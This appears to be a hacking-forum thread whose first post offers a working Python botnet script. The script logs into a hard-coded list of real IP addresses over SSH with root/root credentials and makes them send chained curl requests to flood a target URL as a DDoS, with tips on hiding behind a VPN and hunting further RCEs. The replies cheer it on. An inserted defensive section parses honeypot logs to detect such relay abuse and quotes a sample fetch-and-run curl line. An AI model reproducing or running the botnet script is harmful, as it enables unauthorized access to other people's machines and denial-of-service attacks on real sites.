[PoC] Honeypot Botnet - Weaponizing Honeypots
by viceCoolMan - Wednesday January 1, 2025 at 06:01 PM
#1
Here's a simple SSH botnet made from honeypots.

Numerous honeypots are linked to the intranet, some intentionally designed for hacking. During my investigation into the cracked SSH credentials, I discovered that curl was enabled. By concatenating curl commands, I was able to amplify the DDOS capability. Please use a VPN or VPS while running this script.


Possible improvements: Because the bots are honeypots, you can try running nuclei with the -t CVES/ option to look for web-based RCEs. This could allow you to use Tor to send commands instead of SSH.

import concurrent.futures
import time

from paramiko import SSHClient, AutoAddPolicy


class botnet:
    def __init__(self, url: str):
      self.url = url
      self.bots = ["172.105.7.122","208.83.238.82","174.138.9.176","139.162.118.148","45.33.22.76","143.42.63.163","139.144.26.91","139.144.26.14","139.144.26.231","143.42.229.125","143.42.229.113","139.180.206.8","194.68.44.161","139.144.26.71","143.42.229.133","45.79.141.174","143.42.229.124","143.42.229.140"]
      self.threads = 5#len(self.bots)
      self.requests = 10

      self.active = []

   def task(self, bot_ip):

      try:

         client = SSHClient()
         client.set_missing_host_key_policy(AutoAddPolicy())
         client.connect(bot_ip, username='root', password='root', timeout=10)

         channel = client.invoke_shell()
         channel.recv(1024)
         channel.send('id')
         output = channel.recv(1024)

         if "root" in output.decode():
            channel.close()
            print(f"Connected to Bot {bot_ip}")
            botnet_string = f"curl {self.url} ;"

            #this improvement will concatinat the commands so we only have to sent 1 instead of 10 ssh requests for 10 packets
            for cycle in range(1, self.requests):
               botnet_string += botnet_string

            stdin, stdout, stderr = client.exec_command(botnet_string)
            client.close()
         else:
            pass
         client.close()
      except Exception as e:
         #print(e)
         #print(f"{bot_ip} Didn't connect")
         pass

   def machineGun(self):
      with concurrent.futures.ThreadPoolExecutor(max_workers=self.threads) as executor:
         futures = [executor.submit(self.task, x.strip()) for x in self.bots]


def main():
   t = botnet("https://www.google.com")
   for _ in range(10):
      t.machineGun()

if __name__ == "__main__":
   main()
Reply
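For honeypot operators, the abuse described in post #1 (one SSH command line carrying many chained curl requests to a single URL) shows up in the honeypot's own command log. The following is an added example, not part of the thread: it assumes the honeypot writes Cowrie-style JSON events (`cowrie.command.input` with `input`, `session` and `src_ip` fields), and the sample log lines and the function names are constructed for illustration.

```python
import json
import re
from collections import Counter

# Constructed sample events in Cowrie-style JSON (assumed log format, not from the thread).
SAMPLE_LOG = """\
{"eventid": "cowrie.login.success", "session": "a1", "src_ip": "198.51.100.7", "username": "root", "password": "root"}
{"eventid": "cowrie.command.input", "session": "a1", "src_ip": "198.51.100.7", "input": "id"}
{"eventid": "cowrie.command.input", "session": "a1", "src_ip": "198.51.100.7", "input": "curl https://victim.example/ ;curl https://victim.example/ ;curl https://victim.example/ ;curl https://victim.example/ ;"}
{"eventid": "cowrie.command.input", "session": "b2", "src_ip": "203.0.113.9", "input": "curl -O http://files.example/setup.sh; sh setup.sh"}
not-json garbage line
"""

# One curl invocation and the first URL it names, bounded by shell separators.
CURL_URL = re.compile(r"\bcurl\b[^;|&]*?(https?://[^\s;|&'\"]+)")


def chained_fetches(command: str) -> Counter:
    """Count curl invocations per target URL inside one shell command line."""
    return Counter(m.group(1) for m in CURL_URL.finditer(command))


def find_relay_abuse(log_text: str, threshold: int = 3) -> list:
    """Return command events that repeat curl against one URL >= threshold times."""
    hits = []
    for line in log_text.splitlines():
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or non-JSON lines instead of aborting the scan
        if not isinstance(event, dict) or event.get("eventid") != "cowrie.command.input":
            continue
        for url, count in chained_fetches(event.get("input", "")).items():
            if count >= threshold:
                hits.append({"session": event.get("session"),
                             "src_ip": event.get("src_ip"),
                             "target": url, "count": count})
    return hits


if __name__ == "__main__":
    for hit in find_relay_abuse(SAMPLE_LOG):
        print(hit)
```

A hit means the honeypot is passing real outbound traffic on behalf of whoever logged in; dropping egress from the honeypot network removes the relay regardless of what the log shows.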
#2
very good PoC, GLWS!
My telegram got banned! contact me via PM


Reply
#3
That looks very good
Reply
#4
Wow! Good to learn.
Reply
#5
This is a good topic. Nice share @viceCoolManpawskate
I Love Data
I am gonna be a criminal, Hehehe
Reply

